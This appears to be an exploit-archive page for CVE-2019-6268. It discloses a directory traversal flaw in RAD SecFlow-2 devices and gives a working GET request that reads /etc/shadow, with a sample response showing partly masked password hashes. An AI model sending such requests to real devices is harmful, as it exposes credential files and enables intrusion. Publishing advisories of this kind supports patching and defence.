Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- RAD SecFlow-2 Path Traversal[6]
- Authored by Branko Milicevic[7]
-
RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 suffer from a directory traversal vulnerability.
- advisories | CVE-2019-6268[8]
- SHA-256 |
4fc9777bae6431fffff54a5e1e945548b2d134853e189f941d1edbb9e6269023
- Download[9] | Favorite[10] | View[11]
Change Mirror[12] Download[13]
# Exploit Title: Path traversal in RAD SecFlow-2 devices with Firmware 4.1.01.63
# Date: 3/2024
# CVE: CVE-2019-6268
# Exploit Author: Branko Milicevic
RAD SecFlow-2 devices with Hardware 0202, Firmware 4.1.01.63, and U-Boot 2010.12 allow URIs beginning with /.. for Directory Traversal, as demonstrated by reading /etc/shadow.
Steps to reproduce:
Request:
GET /../../../../../../../../../../etc/shadow HTTP/1.1
Response:
HTTP/1.1 200 OK
root:nDnjJ****ydh3:11851:0:99999:7:::
bin:*:11851:0:99999:7:::
daemon:*:11851:0:99999:7:::
adm:*:11851:0:99999:7:::
lp:*:11851:0:99999:7:::
sync:*:11851:0:99999:7:::
shutdown:*:11851:0:99999:7:::
Vulnerability Type
Directory Traversal
Attack Vectors
Unauthorized attacker can create a crafted request to obtain any file from the operating system (password hashes).
Reference
https://www.owasp.org/index.php/Path_Traversal
File Tags
- ActiveX[19] (933)
- Advisory[20] (84,370)
- Arbitrary[21] (16,579)
- BBS[22] (2,859)
- Bypass[23] (1,818)
- CGI[24] (1,032)
- Code Execution[25] (7,578)
- Conference[26] (687)
- Cracker[27] (844)
- CSRF[28] (3,370)
- DoS[29] (24,373)
- Encryption[30] (2,381)
- Exploit[31] (52,611)
- File Inclusion[32] (4,246)
- File Upload[33] (982)
- Firewall[34] (822)
- Info Disclosure[35] (2,832)
- Intrusion Detection[36] (905)
- Java[37] (3,117)
- JavaScript[38] (887)
- Kernel[39] (6,944)
- Local[40] (14,657)
- Magazine[41] (586)
- Overflow[42] (12,989)
- Perl[43] (1,430)
- PHP[44] (5,174)
- Proof of Concept[45] (2,364)
- Protocol[46] (3,687)
- Python[47] (1,595)
- Remote[48] (31,291)
- Root[49] (3,613)
- Rootkit[50] (519)
- Ruby[51] (617)
- Scanner[52] (1,647)
- Security Tool[53] (7,962)
- Shell[54] (3,236)
- Shellcode[55] (1,217)
- Sniffer[56] (899)
- Spoof[57] (2,255)
- SQL Injection[58] (16,491)
- TCP[59] (2,420)
- Trojan[60] (688)
- UDP[61] (896)
- Virus[62] (668)
- Vulnerability[63] (32,461)
- Web[64] (9,836)
- Whitepaper[65] (3,768)
- x86[66] (966)
- XSS[67] (18,130)
- Other[68]
File Archives
- March 2024[69]
- February 2024[70]
- January 2024[71]
- December 2023[72]
- November 2023[73]
- October 2023[74]
- September 2023[75]
- August 2023[76]
- July 2023[77]
- June 2023[78]
- May 2023[79]
- April 2023[80]
- Older[81]
Systems
- AIX[82] (429)
- Apple[83] (2,060)
- BSD[84] (375)
- CentOS[85] (57)
- Cisco[86] (1,926)
- Debian[87] (6,978)
- Fedora[88] (1,693)
- FreeBSD[89] (1,246)
- Gentoo[90] (4,466)
- HPUX[91] (880)
- iOS[92] (369)
- iPhone[93] (108)
- IRIX[94] (220)
- Juniper[95] (69)
- Linux[96] (48,786)
- Mac OS X[97] (691)
- Mandriva[98] (3,105)
- NetBSD[99] (256)
- OpenBSD[100] (487)
- RedHat[101] (15,203)
- Slackware[102] (941)
- Solaris[103] (1,611)
- SUSE[104] (1,444)
- Ubuntu[105] (9,336)
- UNIX[106] (9,371)
- UnixWare[107] (187)
- Windows[108] (6,635)
- Other[109]
- Services
- Security Services[120]
- Hosting By
- Rokasec[121]